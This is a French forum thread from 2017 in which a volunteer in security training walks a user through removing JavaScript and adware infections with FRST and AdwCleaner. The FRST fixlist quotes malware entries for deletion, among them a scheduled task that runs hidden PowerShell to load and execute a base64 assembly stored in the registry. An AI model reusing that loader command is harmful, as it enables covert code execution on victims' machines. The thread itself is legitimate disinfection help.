Votre question
Résolu

D853TM JS erreur au démarrage

Tags :
  • Demarrage
  • Sécurité
Dernière réponse : dans Sécurité et virus
28 Mai 2017 18:31:10

Bonjour;
merci pour votre aide,j'ai suivi un peu et j'ai donc crée un rapport olt.

https://up.security-x.fr/file.php?h=R02abfcd7809f9f2537...

pouvez vous svp m'aider svp.

Autres pages sur : d853tm erreur demarrage

28 Mai 2017 19:28:15

Bonjour ,

Je m'appelle Misterybean. Je suis actuellement en formation sécurité , je vais te prendre en charge sur ton problème.
Toutes mes réponses seront validées par un expert en sécurité avant de te les poster :) .

OTL n'est plus tenu à jour , on va utiliser l'outil FRST :


FRST :

  • Télécharge la version FRST de Farbar, compatible avec ton système et enregistre le fichier sur ton Bureau <-- Important

    Pour un système en 32 bits -> FRST
    Pour un système en 64 bits -> FRST64
    Comment savoir quelle version 32 bits ou 64 bits est exécutée sur mon système ?

    Patiente le temps que ton navigateur te propose le téléchargement à enregistrer, sans cliquer nulle part, surtout pas sur les sponsors de la page.
    Rappel : FRST doit être enregistré sur ton Bureau <-- Important

  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
    /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Attendre qu'il indique L'outil est prêt à fonctionner comme ci dessous
  • Sur le menu principal, clique sur Analyser et patiente le temps de l'analyse

  • A la fin du scan, les rapports FRST.txt et Addition.txt sont créés. Poste ces rapports dans ta prochaine réponse.
    Les rapports sont enregistrés au même emplacement que l'outil et sous C:\FRST\Logs


  • Le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même

    ---------------------------------------------------------------------------------------------

    Sont attendus les rapports FRST.txt et Addition.txt

    Tous les rapports doivent être hébergés sur ce site d'hébergement de fichiers et tu indiques les liens obtenus dans ta réponse -> Aide à l'utilisation

    :) 
    m
    0
    l
    Contenus similaires

    Meilleure solution

    29 Mai 2017 19:27:03

    Re_

    Tu peux expliquer ça ? , c'est carrément illégal !!!

    Citation :
    ShortcutWithArgument: C:\Users\Pcenforme\Documents\Bureau Dell inspiron mini olive\Backtrack 5 _ Cracker un réseau Wifi protégé par WPA _ Admin Reso.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://www.adminreseau.fr/backtrack-5-cracker-un-reseau-wifi-p...
    ShortcutWithArgument: C:\Users\Pcenforme\Documents\Bureau Dell inspiron mini olive\Pirater Wifi - Les techniques pour hacker un reseau wifi.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://www.logitheque.com/articles/pirater_le_wifi_c_est_facil...
    ShortcutWithArgument: C:\Users\Pcenforme\Documents\Bureau Dell inspiron mini olive\Tutoriel Backtrack 5 _ Comment cracker un réseau Wifi protégé avec du WPA.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://www.geeek.org/tutoriel-backtrack-5-comment-cracker-un-r...


    *******************************************


    Infection par adwares/hijackers qui se sont installés avec ton consentement, en manquant de vigilance lors de l'installation d'applications sponsorisées, tu n'as pas décoché les sponsors proposés.


    Programme à désinstaller :

    --> Quicktime 7 (Plus mis à jour , risque sécurité)
    https://www.generation-nt.com/quicktime-windows-apple-s...

    --> IObit Uninstaller (Inutile et utilise de la ressource)
    --> µTorrent (L'infection vient de l'installation)


    *******************************************


    Attention à utorrent , c'est un vecteur d'infection , à lire :
    https://www.malekal.com/utorrent-et-les-virus/


    *******************************************

    • Ferme toutes les applications, y compris ton navigateur
    • Exécute FRST.exe (clic droit et exécuter en tant qu'administrateur)
    • Attends que l'outil indique "Prêt à fonctionner" comme sur l'image

    • Appuie sur les touches ctrl + y , Un fichier fixlist.txt s'ouvre
    • Copie/colle la totalité du contenu de la zone Code ci-dessous dans ce fichier

      Start
      CreateRestorePoint:
      CloseProcesses:
      Task: {7F118370-F42C-47FD-9839-A048684D0E0C} - System32\Tasks\{6974EEBC-789C-6900-F146-542080F21578} => C:\Users\PCENFO~1\AppData\Local\{71DB4~1\UNINST~1.EXE <==== ATTENTION
      Task: {965F5C2E-1018-44AE-A31A-F32152E978FE} - System32\Tasks\Skype => C:\Users\Pcenforme\AppData\Local\Temp\tmpD856.tmp.js <==== ATTENTION
      Task: {DC2BF341-E5CA-4C93-9FB5-EB09086B12B1} - System32\Tasks\Driver Booster SkipUAC (Pcenforme) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
      Task: C:\WINDOWS\Tasks\{6974EEBC-789C-6900-F146-542080F21578}.job =>
      Task: {B729CE6B-2CF9-41A9-B4CC-0D76FCF69769} - System32\Tasks\bla => powershell -ExecutionPolicy Bypass -WindowStyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Values)).EntryPoint.Invoke($0,$Null)
      AlternateDataStreams: C:\ProgramData\TEMP:D5FBE8F9 [172]
      FirewallRules: [{D074B874-2475-4171-A453-500F1582EA30}] => (Allow) C:\Users\Pcenforme\AppData\Local\Chromium\Application\chrome.exe
      FirewallRules: [TCP Query User{3AF8F026-20A2-48F7-B31E-9A84DE05A4EE}J:\pcenforme\downloads\cacaoweb.exe] => (Allow) J:\pcenforme\downloads\cacaoweb.exe
      FirewallRules: [UDP Query User{667E211A-EA4A-45DA-843F-A5798DD7BE8E}J:\pcenforme\downloads\cacaoweb.exe] => (Allow) J:\pcenforme\downloads\cacaoweb.exe
      HKU\S-1-5-21-2520613229-2769233371-997534247-1006\...\Run: [1SVUXSMHOK] => C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpD856.tmp.js [39670 2017-03-22] ()
      HKU\S-1-5-21-2520613229-2769233371-997534247-1006\...\Run: [UW78CGLUTF] => C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\facebook.js [39680 2017-03-22] ()
      HKU\S-1-5-21-2520613229-2769233371-997534247-1006\...\Run: [Q5KMWA0FVI] => "C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java update.js"
      HKU\S-1-5-21-2520613229-2769233371-997534247-1006\...\Run: [TZXSB3QELF] => C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.js [39688 2017-03-22] ()
      AppInit_DLLs-x32: C:\PROGRA~2\Sophos\SOPHOS~1\\SOPHOS~1.DLL => Pas de fichier
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Avast.js [2017-03-22] ()
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\facebook.js [2017-03-22] ()
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java update.js [2017-03-22] ()
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.js [2017-03-22] ()
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmpD856.tmp.js [2017-03-22] ()
      InternetURL: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uEKGSjyFHQ.url -> URL: file:///C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\µTorrent.exe
      Startup: C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\µTorrent.exe [2017-03-22] ()
      SearchScopes: HKU\S-1-5-21-2520613229-2769233371-997534247-1006 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
      SearchScopes: HKU\S-1-5-21-2520613229-2769233371-997534247-1006 -> {a62abdee-78a2-4ddb-9355-1c334abd6e43} URL =
      C:\Windows\Tasks\{6974EEBC-789C-6900-F146-542080F21578}.job
      CHR HKLM-x32\...\Chrome\Extension: [kpdmjodecdegfglgaapafjleomjjlpnh] - hxxps://clients2.google.com/service/update2/crx
      S1 cfxxcrcy; \??\C:\WINDOWS\system32\drivers\cfxxcrcy.sys [X]
      C:\Program Files (x86)\IObit\Driver Booster
      C:\Users\Pcenforme\AppData\Local\Chromium
      C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.js
      C:\Users\Pcenforme\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\µTorrent.exe
      EmptyTemp:
      end

    • Une fois le texte copié , ferme le fichier avec la croix , il va te demander d'enregistrer , acceptes
    • Sur le menu principal, clique une seule fois sur Corriger et patiente le temps de la correction
    • Le pc va demander à redémarrer, accepte.
    • L'outil va créer un rapport de correction Fixlog.txt sur le bureau. Poste ce rapport dans ta réponse.


  • /!\ Ce script a été établi pour cet utilisateur, il n'est pas compatible avec un autre système/utilisateur et ne
    doit pas être utilisé même pour des symptômes identiques /!\



    *******************************************

    Dis moi ensuite comment se comporte le PC

    Rapport attendu :Fixlog.txt
    partage
    31 Mai 2017 21:25:00

    Bonjour
    désoler pour le retard;
    j'étais assez deborder...
    pour backtrack5 c'est un lien favori qu'on avait essayer d'utliser avec un stagiare pour voir si mon réseau était suer car j'avais une alerte ,mais je me souviens pas qu'on est installer quelques choses.
    j'essaye le script et je reviens merci.
    iobit c'était pour supprimer un fichier récalecitrant.
    utorrent je m'en suis servi pour download driverspack et deux softs mac recover.
    sinon j'utilise keyviewer de nirsoft qui me met souvent des alertes.


    m
    0
    l
    31 Mai 2017 22:44:27

    Re_


    Citation :
    utorrent je m'en suis servi pour download driverspack et deux softs mac recover.


    Je ne sais pas où tu as récupéré Utorrent , mais l'infection correspond au moment de son installation .

    *************************

    On va vérifier que c'est bon au niveau infection :

    AdwCleaner - Recherche : /!\ Mode recherche uniquement
    • Télécharge AdwCleaner de Xplode et enregistre le fichier sur ton Bureau
    • Ferme toutes les applications, y compris ton navigateur
    • Double-clique sur l'icône AdwCleaner.exe pour lancer l'installation
      /!\ Sous Vista, Windows 7 et 8, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
    • Sur le menu principal, clique sur Scanner
    • Les éléments détectés s'affichent dans les différents onglets. Clique sur Rapport
    • Un rapport AdwCleaner(R).txt s'ouvre. Poste ce rapport dans ta prochaine réponse
      Le rapport se trouve sous C:\AdwCleaner(R).txt


  • :) 
    m
    0
    l
    2 Juin 2017 12:01:30

    merci ;je vais le faire ce soir ou très prochainnement.
    Vous est'il possible de me contactez en privé.
    d'autre part depuis le premier nettoyage j'ai enfin réussi à upgrater ma version w10,et la machine marche mieux.
    L'infection est de quel ordre,je tiens vraiement à vous rmercier.
    J'ai également mon portable à vous faire vérifier,si cela vous est possible.
    EZncore merci pour ce brillant,travail,j'aimerai beaucoup avancer et comprendre ce domaine d'expertise.
    Bonne journée à bientôt
    m
    0
    l
    2 Juin 2017 13:00:39

    Bonjour ,

    Citation :
    merci ;je vais le faire ce soir ou très prochainnement.


    Lors d'une infection , il faut faire les corrections le plus rapidement possible , car la navigation internet , des programmes
    non à jour , risque d'infecter à nouveau ou réactiver l'infection si elle n'est pas traitée complètement .

    Citation :
    Vous est'il possible de me contactez en privé.


    Non ,pas possible , trop compliqué et étant en formation , mes correcteurs doivent avoir accès à tout .

    Citation :
    J'ai également mon portable à vous faire vérifier,si cela vous est possible.


    Il faudra créer un nouveau sujet : Un PC par sujet .

    Citation :
    EZncore merci pour ce brillant,travail,j'aimerai beaucoup avancer et comprendre ce domaine d'expertise.


    La formation dure entre un et deux ans voire plus en fonction du temps à y consacrer , mais comme les formateurs sont également bénévoles ,
    ils ne peuvent pas prendre beaucoup de personnes et les places sont donc sporadique

    :) 
    m
    0
    l
    Tom's guide dans le monde
    • Allemagne
    • Italie
    • Irlande
    • Royaume Uni
    • Etats Unis
    Suivre Tom's Guide
    Inscrivez-vous à la Newsletter
    • ajouter à twitter
    • ajouter à facebook
    • ajouter un flux RSS